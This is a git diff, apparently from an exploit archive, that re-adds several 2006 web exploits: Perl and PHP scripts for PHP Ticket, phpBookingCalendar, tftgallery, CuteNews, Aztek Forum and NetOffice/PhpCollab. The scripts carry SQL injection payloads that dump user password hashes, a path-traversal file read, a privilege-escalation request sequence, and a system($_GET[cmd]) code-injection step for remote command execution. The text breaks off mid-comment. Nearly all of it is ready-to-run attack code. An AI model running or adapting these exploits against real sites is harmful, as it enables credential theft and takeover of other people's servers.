-$postdata .= "frm_query=a&frm_search_in=1%3D0+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2CCONCAT%280x30576e656420%2Cuser%2C0x20%2Cpasswd%29%2C1%2C1%2C1%2C1%2C1%2C1+from+user--&frm_ordertype=date&frm_order_desc=DESC&frm_querytype=%25";
-$data = sendpacket($site, $packet2.$postdata);
-
-
-print "password are encrypted with the PASSWORD() function of mysql\n\n";
-
-printf("username%-20spassword\n", " ");
-printf("--------%-20s--------\n", " ");
-my $index = 0;
-while(($index = index($data,"0Wned ", $index)) != -1)
-{
-	$index += 6;
-	my $index2 = index($data," ", $index);
-	my $index3 = index($data,"</A>", $index2);
-	printf("%s%-20s%s\n", substr($data,$index,$index2-$index) , " ", substr($data,$index2+1,$index3-($index2+1)));
-	$index = $index3+4;
-}
-
-
-sub sendpacket(\$,\$) {
-	my $server = shift;
-	my $request = shift;
-
-	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
-	print $sock "$request";
-
-	
-	my $data = "";
-	my $answer;
-	while($answer = <$sock>)
-	{
-		$data .= $answer;
-	}
-	
-	close($sock);
-	return $data;
-}
-
-sub usage() {
-	printf "usage: %s <website> <user> <password>\n", $0;
-	printf "exemple: %s www.site.com/phpticket/\n", $0;
-	exit;
-}
-
-# milw0rm.com [2006-03-25]
+#!/usr/bin/perl
+
+###############################################################################
+#Copyright (C) undefined1_
+#
+#This program is free software; you can redistribute it and/or
+#modify it under the terms of the GNU General Public License
+#as published by the Free Software Foundation; either version 2
+#of the License, or (at your option) any later version.
+#
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#GNU General Public License for more details.
+#
+#You should have received a copy of the GNU General Public License
+#along with this program; if not, write to the Free Software
+#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+#
+###############################################################################
+
+use strict; 
+use IO::Socket;
+
+$| = 1;
+printf ":: php ticket <= 0.71 exploit (privilege escalation) - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
+
+
+my $website = shift || usage();
+my $user = shift || usage();
+my $password = shift || usage();
+
+my $path = "/";
+my $site = $website;
+if(index($website, "/") != -1)
+{
+	my $index = index($website, "/");
+	$path = substr($website, $index);
+	$site = substr($website, 0, $index);
+	if(substr($path, length($path)-1) ne "/")
+	{
+		$path .= "/";
+	}
+}
+
+
+my $eop = "\r\nHost: $site\r\n";
+$eop .= "User-Agent: Mozilla/5.0\r\n";
+$eop .= "Connection: close\r\n";
+
+
+
+my $packet1 = "POST ".$path."search.php HTTP/1.1\r\n";
+my $postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
+$postdata .= "Host: $site\r\n";
+$postdata .= "User-Agent: Mozilla/5.0\r\n";
+$postdata .= "Connection: close\r\n";
+$postdata .= "Content-Length: 31\r\n";
+$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
+$postdata .= "frm_user=".$user."&frm_passwd=".$password;
+my $data = sendpacket($site, $packet1.$postdata);
+
+
+
+my $packet2 = "POST ".$path."search.php HTTP/1.1\r\n";
+$postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
+$postdata .= "Host: $site\r\n";
+$postdata .= "User-Agent: Mozilla/5.0\r\n";
+$postdata .= "Connection: close\r\n";
+$postdata .= "Content-Length: 215\r\n";
+$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
+$postdata .= "frm_query=a&frm_search_in=1%3D0+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2CCONCAT%280x30576e656420%2Cuser%2C0x20%2Cpasswd%29%2C1%2C1%2C1%2C1%2C1%2C1+from+user--&frm_ordertype=date&frm_order_desc=DESC&frm_querytype=%25";
+$data = sendpacket($site, $packet2.$postdata);
+
+
+print "password are encrypted with the PASSWORD() function of mysql\n\n";
+
+printf("username%-20spassword\n", " ");
+printf("--------%-20s--------\n", " ");
+my $index = 0;
+while(($index = index($data,"0Wned ", $index)) != -1)
+{
+	$index += 6;
+	my $index2 = index($data," ", $index);
+	my $index3 = index($data,"</A>", $index2);
+	printf("%s%-20s%s\n", substr($data,$index,$index2-$index) , " ", substr($data,$index2+1,$index3-($index2+1)));
+	$index = $index3+4;
+}
+
+
+sub sendpacket(\$,\$) {
+	my $server = shift;
+	my $request = shift;
+
+	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
+	print $sock "$request";
+
+	
+	my $data = "";
+	my $answer;
+	while($answer = <$sock>)
+	{
+		$data .= $answer;
+	}
+	
+	close($sock);
+	return $data;
+}
+
+sub usage() {
+	printf "usage: %s <website> <user> <password>\n", $0;
+	printf "exemple: %s www.site.com/phpticket/\n", $0;
+	exit;
+}
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1610.txt b/platforms/php/webapps/1610.txt
index bae637912..d8408e04f 100755
--- a/platforms/php/webapps/1610.txt
+++ b/platforms/php/webapps/1610.txt
@@ -1,10 +1,10 @@
-PoC by undefined1_ @ bash-x.net/undef/
-
-phpBookingCalendar <= 1.0c
-"A PHP/MySQL Booking Calendar Application."
-http://www.jjwdesign.com/booking_calendar.html
-
-phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
-www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
-
-# milw0rm.com [2006-03-25]
+PoC by undefined1_ @ bash-x.net/undef/
+
+phpBookingCalendar <= 1.0c
+"A PHP/MySQL Booking Calendar Application."
+http://www.jjwdesign.com/booking_calendar.html
+
+phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
+www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1611.pl b/platforms/php/webapps/1611.pl
index 92a5b5296..fb98ffcb7 100755
--- a/platforms/php/webapps/1611.pl
+++ b/platforms/php/webapps/1611.pl
@@ -1,107 +1,107 @@
-#!/usr/bin/perl
-
-###############################################################################
-#Copyright (C) undefined1_
-#
-#This program is free software; you can redistribute it and/or
-#modify it under the terms of the GNU General Public License
-#as published by the Free Software Foundation; either version 2
-#of the License, or (at your option) any later version.
-#
-#This program is distributed in the hope that it will be useful,
-#but WITHOUT ANY WARRANTY; without even the implied warranty of
-#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-#GNU General Public License for more details.
-#
-#You should have received a copy of the GNU General Public License
-#along with this program; if not, write to the Free Software
-#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
-#
-###############################################################################
-
-use strict; 
-use IO::Socket;
-
-$| = 1;
-printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
-
-
-my $website = shift || usage();
-
-my $path = "/";
-my $site = $website;
-if(index($website, "/") != -1)
-{
-	my $index = index($website, "/");
-	$path = substr($website, $index);
-	$site = substr($website, 0, $index);
-	if(substr($path, length($path)-1) ne "/")
-	{
-		$path .= "/";
-	}
-}
-
-
-my $eop = "\r\nHost: $site\r\n";
-$eop .= "User-Agent: Mozilla/5.0\r\n";
-$eop .= "Connection: close\r\n\r\n";
-
-
-my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
-my $data = sendpacket($site, $packet1.$eop);
-
-if($data !~ /HTTP\/1.1 200 OK/)
-{
-	die "failed to retrieve the admin password\n";
-}
-
-my $password = "";
-if (index($data, "\r\n\r\n") != -1)
-{
-	$password = substr($data, index($data, "\r\n\r\n")+4);
-	chomp $password;
-}
-else
-{
-	die "failed to retrieve the admin password\n";
-}
-
-print "The password hash is: '$password'\n";
-if(crypt("admin","tftgallery") eq $password)
-{
-	print "The plaintext password is: 'admin'\n";		
-}
-else
-{
-	die "Use john the ripper, luke!\n";
-}
-
-
-
-
-sub sendpacket(\$,\$) {
-	my $server = shift;
-	my $request = shift;
-
-	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
-	print $sock "$request";
-
-	
-	my $data = "";
-	my $answer;
-	while($answer = <$sock>)
-	{
-		$data .= $answer;
-	}
-	
-	close($sock);
-	return $data;
-}
-
-sub usage() {
-	printf "usage: %s <website> [password]\n", $0;
-	printf "ex. : %s www.site.com/tftgallery/\n", $0;
-	exit;
-}
-
-# milw0rm.com [2006-03-25]
+#!/usr/bin/perl
+
+###############################################################################
+#Copyright (C) undefined1_
+#
+#This program is free software; you can redistribute it and/or
+#modify it under the terms of the GNU General Public License
+#as published by the Free Software Foundation; either version 2
+#of the License, or (at your option) any later version.
+#
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#GNU General Public License for more details.
+#
+#You should have received a copy of the GNU General Public License
+#along with this program; if not, write to the Free Software
+#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+#
+###############################################################################
+
+use strict; 
+use IO::Socket;
+
+$| = 1;
+printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
+
+
+my $website = shift || usage();
+
+my $path = "/";
+my $site = $website;
+if(index($website, "/") != -1)
+{
+	my $index = index($website, "/");
+	$path = substr($website, $index);
+	$site = substr($website, 0, $index);
+	if(substr($path, length($path)-1) ne "/")
+	{
+		$path .= "/";
+	}
+}
+
+
+my $eop = "\r\nHost: $site\r\n";
+$eop .= "User-Agent: Mozilla/5.0\r\n";
+$eop .= "Connection: close\r\n\r\n";
+
+
+my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
+my $data = sendpacket($site, $packet1.$eop);
+
+if($data !~ /HTTP\/1.1 200 OK/)
+{
+	die "failed to retrieve the admin password\n";
+}
+
+my $password = "";
+if (index($data, "\r\n\r\n") != -1)
+{
+	$password = substr($data, index($data, "\r\n\r\n")+4);
+	chomp $password;
+}
+else
+{
+	die "failed to retrieve the admin password\n";
+}
+
+print "The password hash is: '$password'\n";
+if(crypt("admin","tftgallery") eq $password)
+{
+	print "The plaintext password is: 'admin'\n";		
+}
+else
+{
+	die "Use john the ripper, luke!\n";
+}
+
+
+
+
+sub sendpacket(\$,\$) {
+	my $server = shift;
+	my $request = shift;
+
+	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
+	print $sock "$request";
+
+	
+	my $data = "";
+	my $answer;
+	while($answer = <$sock>)
+	{
+		$data .= $answer;
+	}
+	
+	close($sock);
+	return $data;
+}
+
+sub usage() {
+	printf "usage: %s <website> [password]\n", $0;
+	printf "ex. : %s www.site.com/tftgallery/\n", $0;
+	exit;
+}
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1612.php b/platforms/php/webapps/1612.php
index 6fa4e6751..1d1281395 100755
--- a/platforms/php/webapps/1612.php
+++ b/platforms/php/webapps/1612.php
@@ -1,188 +1,188 @@
-<?php
-// Happy NEW Iranian year .
-// Happy Norouz  ( PERSIAN celebration )
-// CuteNews 1.4.1 (CutePHP.com) Hash password Finder
-// by Hamid Ebadi
-// http://hamid.ir
-// Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :.
-// run it from your browser...
-// make these changes in php.ini if you have troubles with this script
-
-//allow_call_time_pass_reference = on
-//register_globals = On
-
-error_reporting(0);
-echo '<head><title>CuteNews 1.4.1 user Hash password Finder
-      
-      
-      
-
CuteNews 1.4.1 (and Below) user Hash password Finder 

- 
Security ? . 

- 
Bug Discovered and Exploited by Hamid Ebadi  .: Hamid Network Security Team :.

-
Happy Norouz  ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com  c0d3r.org  kapda.ir simorgh-ev.com hat-squad.com  blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir  and ...

-
-
-
-
read this paper about CuteNews 1.4.1   vulnerability

-
-  
-    
-  
-

-     

-      

-       
-      hostname (ex: www.sitename.com) 

-      

-        
-        path (ex: /cutenews/example2.php ) 

-      

-      
-        specify a port other than 80 (default value) 

-      

-      
-        send exploit through an HTTP proxy (ip:port) 

-      

-      
-        specify a file  other than /../users.db.php%00 to read  

-      

-          
-      

-
Spacial THX : rgod at http://rgod.altervista.org for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)

-    

-
-';
-
-function show($headeri)
-{
-$host=$_POST[host];
-$path=$_POST[path];
-$port=$_POST[port];
-$proxy=$_POST[proxy];
-$command=$_POST[command];
-$ii=0;
-$ji=0;
-$ki=0;
-$ci=0;
-echo '';
-while ($ii <= strlen($headeri)-1)
-{
-$datai=dechex(ord($headeri[$ii]));
-if ($ji==16) {
-             $ji=0;
-             $ci++;
-             echo "";
-             for ($li=0; $li<=15; $li++)
-                      { echo "";
-       }
-            $ki=$ki+16;
-            echo "";
-            }
-if (strlen($datai)==1) {echo "";} else
-{echo " ";}
-$ii++;
-$ji++;
-}
-for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
-                      { echo "";
-                       }
-
-for ($li=$ci*16; $li<=strlen($headeri); $li++)
-                      { echo "";
-       }
-
-echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
";
-}
-
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-
-if ( ($host<>''))
-{
-if ($port=='') {$port=80;}
-if ($path=='') {$path="example2.php";}
-
-if ($command=='') {$command="/..//users.db.php%00";}
-$data="archive=".$command;
-if ($proxy=='')
-       {$packet="POST ".$path."  HTTP/1.1\r\n";}
-else
-       {
-        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
-        if ($c==0) {
-                    echo 'check the proxy...
';
-             die;
-            }
-         else
-        {$packet="POST http://".$host.$path." HTTP/1.1\r\n";}
-        }
-
-$packet.="Accept: */*\r\n";
-$packet.="Referer: http://".$host.$path."\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-
-echo '
 Sending exploit to '.$host.'
';
-
-if ($proxy=='')
-           {$fp=fsockopen(gethostbyname($host),$port);}
-           else
-           {$parts=explode(':',$proxy);
-     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
-     $fp=fsockopen($parts[0],$parts[1]);
-     if (!$fp) { echo 'No response from proxy...';
-   die;
-         }
-
-     }
-echo $packet ;
-show($packet);
-fputs($fp,$packet);
-
-if ($proxy=='')
-{ $data='';
-     while (!feof($fp))
-     {
-      $data.=fgets($fp);
-     }
-}
-else
-{
-$data='';
-   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
-   {
-      $data.=fread($fp,1);
-   }
-
-}
-fclose($fp);
-if (eregi('HTTP/1.1 200 OK',$data))
-    {echo 'Exploit sent...
 If CuteNews 1.4.1   is unpatched and vulnerable  
';
-     echo 'you will see '.htmlentities($command).' output inside HTML...

';
-    }
-else
-    {echo 'Error, see output...';}
-
-//show($data); //debug: show output in a packet dump...
-//echo nl2br(htmlentities($data));
-echo $data;
-}
-?> 
-
-# milw0rm.com [2006-03-26]
+CuteNews 1.4.1 user Hash password Finder
+      
+      
+      
+
CuteNews 1.4.1 (and Below) user Hash password Finder 

+ 
Security ? . 

+ 
Bug Discovered and Exploited by Hamid Ebadi  .: Hamid Network Security Team :.

+
Happy Norouz  ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com  c0d3r.org  kapda.ir simorgh-ev.com hat-squad.com  blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir  and ...

+
+
+
+
read this paper about CuteNews 1.4.1   vulnerability

+
+  
+    
+  
+

+     

+      

+       
+      hostname (ex: www.sitename.com) 

+      

+        
+        path (ex: /cutenews/example2.php ) 

+      

+      
+        specify a port other than 80 (default value) 

+      

+      
+        send exploit through an HTTP proxy (ip:port) 

+      

+      
+        specify a file  other than /../users.db.php%00 to read  

+      

+          
+      

+
Spacial THX : rgod at http://rgod.altervista.org for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)

+    

+
+';
+
+function show($headeri)
+{
+$host=$_POST[host];
+$path=$_POST[path];
+$port=$_POST[port];
+$proxy=$_POST[proxy];
+$command=$_POST[command];
+$ii=0;
+$ji=0;
+$ki=0;
+$ci=0;
+echo '';
+while ($ii <= strlen($headeri)-1)
+{
+$datai=dechex(ord($headeri[$ii]));
+if ($ji==16) {
+             $ji=0;
+             $ci++;
+             echo "";
+             for ($li=0; $li<=15; $li++)
+                      { echo "";
+       }
+            $ki=$ki+16;
+            echo "";
+            }
+if (strlen($datai)==1) {echo "";} else
+{echo " ";}
+$ii++;
+$ji++;
+}
+for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
+                      { echo "";
+                       }
+
+for ($li=$ci*16; $li<=strlen($headeri); $li++)
+                      { echo "";
+       }
+
+echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
";
+}
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+
+if ( ($host<>''))
+{
+if ($port=='') {$port=80;}
+if ($path=='') {$path="example2.php";}
+
+if ($command=='') {$command="/..//users.db.php%00";}
+$data="archive=".$command;
+if ($proxy=='')
+       {$packet="POST ".$path."  HTTP/1.1\r\n";}
+else
+       {
+        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
+        if ($c==0) {
+                    echo 'check the proxy...
';
+             die;
+            }
+         else
+        {$packet="POST http://".$host.$path." HTTP/1.1\r\n";}
+        }
+
+$packet.="Accept: */*\r\n";
+$packet.="Referer: http://".$host.$path."\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+
+echo '
 Sending exploit to '.$host.'
';
+
+if ($proxy=='')
+           {$fp=fsockopen(gethostbyname($host),$port);}
+           else
+           {$parts=explode(':',$proxy);
+     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
+     $fp=fsockopen($parts[0],$parts[1]);
+     if (!$fp) { echo 'No response from proxy...';
+   die;
+         }
+
+     }
+echo $packet ;
+show($packet);
+fputs($fp,$packet);
+
+if ($proxy=='')
+{ $data='';
+     while (!feof($fp))
+     {
+      $data.=fgets($fp);
+     }
+}
+else
+{
+$data='';
+   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
+   {
+      $data.=fread($fp,1);
+   }
+
+}
+fclose($fp);
+if (eregi('HTTP/1.1 200 OK',$data))
+    {echo 'Exploit sent...
 If CuteNews 1.4.1   is unpatched and vulnerable  
';
+     echo 'you will see '.htmlentities($command).' output inside HTML...

';
+    }
+else
+    {echo 'Error, see output...';}
+
+//show($data); //debug: show output in a packet dump...
+//echo nl2br(htmlentities($data));
+echo $data;
+}
+?> 
+
+# milw0rm.com [2006-03-26]
diff --git a/platforms/php/webapps/1616.pl b/platforms/php/webapps/1616.pl
index fd20e6d54..8946e3ae4 100755
--- a/platforms/php/webapps/1616.pl
+++ b/platforms/php/webapps/1616.pl
@@ -1,116 +1,116 @@
-#!/usr/bin/perl
-use IO::Socket;
-# Aztek Forum 4.00 Change User Rights Remote Exploit
-#
-# only if the magic_quote are : OFF <<<<<<<<<<<<<<<<<<<<<<
-#
-# Hum hum , sorry for my bad english i'm french ;)
-# Note : Before using this exploit you must create a count on the board :) 
-# And this count will receive the administrator
-# rights !
-# aztek_gar.pl    
-# aztek_gar.pl 127.0.0.1 /aztek/ Admin Attacker
-#
-#
-#+------------------------------------------------------------+
-#- Aztek 4.0 Give Admin rights to a normal user   -
-#-                                                                           
-#     -
-#-                         coded by _Sparah_                      -
-#+-----------------------------------------------------------+
-#
-# [~] Connection to 127.0.0.1 on port 80 ...
-#
-# [+] CoOkie : ATK_ADMIN=6688f12bf61a432c22e38c46a194e6ea
-#
-# [!] D0ne !
-
-# var
-$host = $ARGV[0];
-$path = $ARGV[1];
-$owner = $ARGV[2];
-$user = $ARGV[3];
-
-#banner
-if (@ARGV<4) {
-print q(
-
-+--------+
-| banner |
-+---------------------------------------------+
-|Aztek 4.0 Give Admin Rights to a normal user |
-|                                             |
-|                              by _Sparah_    |
-+---------------------------------------------+
-                    -=[X]=-
-+---------------------------------------------+
-| http://www.eos-team.be/                     |
-| http://sparah.next-touch.com/ (soon)        |
-+---------------------------------------------+
-                    -=[X]=-
-+---------------------------------------------+
-| Usage :                                     |
-|                                             |
-| *.pl         |
-| ex : 127.0.0.1 /aztek/ Admin Attacker       |
-|                                             |
-+---------------------------------------------+
-                                       | E.o.S|
-                                       +------+
-
-);exit();}
-
-print "
-
-+----------------------------------------------+
-- Aztek 4.0 Give Admin rights to a normal user -
--                                              -
--                         coded by _Sparah_    -
-+----------------------------------------------+
-
-";
-
-print "\n[~] Connection to $host on port 80 ...\n";
-
-#1st request
-$req1= "login=".$owner."%27%23&passwd=";
-$len1= length $req1;
-
-$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort 
-=> "80") || die "\n[-] Connection failed...";
-print $send "POST ".$path."myadmin.php?action=login HTTP/1.1\n";
-print $send "Host: $host\n";
-print $send "Cookie: ATK_PASSWD=; ATK_LOGIN=nobody; ATK_SESS=\n";
-print $send "Content-Type: application/x-www-form-urlencoded\n";
-print $send "Content-Length: ".$len1."\n\n";
-print $send "".$req1."\n";
-
-# take cookie value
-while(chomp($cookie=<$send>))
-{
-    if ($cookie =~ /Set\-Cookie\: (\S+)/)
-    {
-        $ATK=$1;
-        close($send);
-    }
-}
-
-print "\n[+] CoOkie : ".$ATK."\n";
-
-# 2nd request
-$req2 = 
-"login=".$user."&priv%5B%5D=0&priv%5B%5D=1&priv%5B%5D=4&priv%5B%5D=2&priv%5B%5D=3&priv%5B%5D=5";
-$len2 = length $req2;
-$data = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort 
-=> "80") || die "\n[-] Connection failed...";
-print $data "POST ".$path."myadmin.php?action=admin&choix=6 HTTP/1.1\n";
-print $data "Host: ".$host."\n";
-print $data "Cookie: ".$ATK."\n";
-print $data "Content-Type: application/x-www-form-urlencoded\n";
-print $data "Content-Length: ".$len2."\n\n";
-print $data "".$req2."\n";
-read $data,$res,9000;
-print $res;
-print "\n[!] D0ne !\n\n";
-
-# milw0rm.com [2006-03-26]
+#!/usr/bin/perl
+use IO::Socket;
+# Aztek Forum 4.00 Change User Rights Remote Exploit
+#
+# only if the magic_quote are : OFF <<<<<<<<<<<<<<<<<<<<<<
+#
+# Hum hum , sorry for my bad english i'm french ;)
+# Note : Before using this exploit you must create a count on the board :) 
+# And this count will receive the administrator
+# rights !
+# aztek_gar.pl    
+# aztek_gar.pl 127.0.0.1 /aztek/ Admin Attacker
+#
+#
+#+------------------------------------------------------------+
+#- Aztek 4.0 Give Admin rights to a normal user   -
+#-                                                                           
+#     -
+#-                         coded by _Sparah_                      -
+#+-----------------------------------------------------------+
+#
+# [~] Connection to 127.0.0.1 on port 80 ...
+#
+# [+] CoOkie : ATK_ADMIN=6688f12bf61a432c22e38c46a194e6ea
+#
+# [!] D0ne !
+
+# var
+$host = $ARGV[0];
+$path = $ARGV[1];
+$owner = $ARGV[2];
+$user = $ARGV[3];
+
+#banner
+if (@ARGV<4) {
+print q(
+
++--------+
+| banner |
++---------------------------------------------+
+|Aztek 4.0 Give Admin Rights to a normal user |
+|                                             |
+|                              by _Sparah_    |
++---------------------------------------------+
+                    -=[X]=-
++---------------------------------------------+
+| http://www.eos-team.be/                     |
+| http://sparah.next-touch.com/ (soon)        |
++---------------------------------------------+
+                    -=[X]=-
++---------------------------------------------+
+| Usage :                                     |
+|                                             |
+| *.pl         |
+| ex : 127.0.0.1 /aztek/ Admin Attacker       |
+|                                             |
++---------------------------------------------+
+                                       | E.o.S|
+                                       +------+
+
+);exit();}
+
+print "
+
++----------------------------------------------+
+- Aztek 4.0 Give Admin rights to a normal user -
+-                                              -
+-                         coded by _Sparah_    -
++----------------------------------------------+
+
+";
+
+print "\n[~] Connection to $host on port 80 ...\n";
+
+#1st request
+$req1= "login=".$owner."%27%23&passwd=";
+$len1= length $req1;
+
+$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort 
+=> "80") || die "\n[-] Connection failed...";
+print $send "POST ".$path."myadmin.php?action=login HTTP/1.1\n";
+print $send "Host: $host\n";
+print $send "Cookie: ATK_PASSWD=; ATK_LOGIN=nobody; ATK_SESS=\n";
+print $send "Content-Type: application/x-www-form-urlencoded\n";
+print $send "Content-Length: ".$len1."\n\n";
+print $send "".$req1."\n";
+
+# take cookie value
+while(chomp($cookie=<$send>))
+{
+    if ($cookie =~ /Set\-Cookie\: (\S+)/)
+    {
+        $ATK=$1;
+        close($send);
+    }
+}
+
+print "\n[+] CoOkie : ".$ATK."\n";
+
+# 2nd request
+$req2 = 
+"login=".$user."&priv%5B%5D=0&priv%5B%5D=1&priv%5B%5D=4&priv%5B%5D=2&priv%5B%5D=3&priv%5B%5D=5";
+$len2 = length $req2;
+$data = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort 
+=> "80") || die "\n[-] Connection failed...";
+print $data "POST ".$path."myadmin.php?action=admin&choix=6 HTTP/1.1\n";
+print $data "Host: ".$host."\n";
+print $data "Cookie: ".$ATK."\n";
+print $data "Content-Type: application/x-www-form-urlencoded\n";
+print $data "Content-Length: ".$len2."\n\n";
+print $data "".$req2."\n";
+read $data,$res,9000;
+print $res;
+print "\n[!] D0ne !\n\n";
+
+# milw0rm.com [2006-03-26]
diff --git a/platforms/php/webapps/1617.php b/platforms/php/webapps/1617.php
index 24cb384a3..c249db3f3 100755
--- a/platforms/php/webapps/1617.php
+++ b/platforms/php/webapps/1617.php
@@ -1,173 +1,173 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with magic_quotes_gpc = Off\r\n\r\n";
-echo "a googledork: intitle:phpcollab|netoffice \"index of\" -www-apps -php-collab.org -ext:xml\r\n\r\n";
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path email OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to NetOffice or PHPCollab\r\n";
-echo "email:     your email\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /NetOffice/ youremail@somehost.com\n";
-echo "php ".$argv[0]." localhost /PhpCollab/ youremail@somehost.com -p81\r\n";
-echo "php ".$argv[0]." localhost / youremail@somehost.com -P1.1.1.1:80\r\n";
-die;
-}
-
-/* explaination:
-
-   tested & working against: PhpCollab v2.4
-			     PhpCollab v2.5 rc3
-	                     NetOffice v2.5.3-pl1
-	                     NetOffice v2.6.0b2
-   vulnerability;
-
-   SQL injection in "forgotten password" feature:
-   if magic_quotes_gpc=Off you can send yourself the admin (md5(), crypt() or
-   plain text) password, poc:
-   you can submit a "loginForm" POST value like this to general/sendpassword.php
-   script :
-
-  'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5(),
-  crypt() or in plain text): ',password),password,name,title,'[your email here]'
-  ,null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php','',''
-  ,null FROM members mem WHERE id=1/*
-
-  query becomes:
-   SELECT mem.*, org.name, log.connected FROM members mem LEFT OUTER JOIN
-   organizations org ON org.id = mem.organization LEFT OUTER JOIN logs log ON
-   log.login = mem.login  WHERE mem.login = ''UNION SELECT id,1,CONCAT('this is
-   the real password (encrypted with md5(),crypt() or in plain text): ',password
-   ),password,name,title,'[your email]',null,'','','','',null,1,'2006-03-27 20:
-   48',0,'administration/admin.php','','',null FROM members mem WHERE id=1/*'
-
-  you will receive soon a mail like this:
-
-  Username : this is the real password (encrypted with md5(),crypt() or in plain text): [password]
-  password : [random generated password]
-
-  ignore password field, password is not changed, 'cause the UPDATE query fails,
-  but the real one is showed in Username mail field.
-
-  once you are admin, you can inject arbitrary code in settings.php
-  (you know, magic_quotes_gpc is off), poc:
-  login, go to "Edit settings" feature, in FTP SERVER field type:
-
-  '); system($_GET[cmd]); print ('
-
-  in settings.php, near line 38, you have:
-
-  ...
-  define('FTPSERVER',''); system($_GET[cmd]); print ('');
-  ...
-
-  so you can launch commands, ex:
-
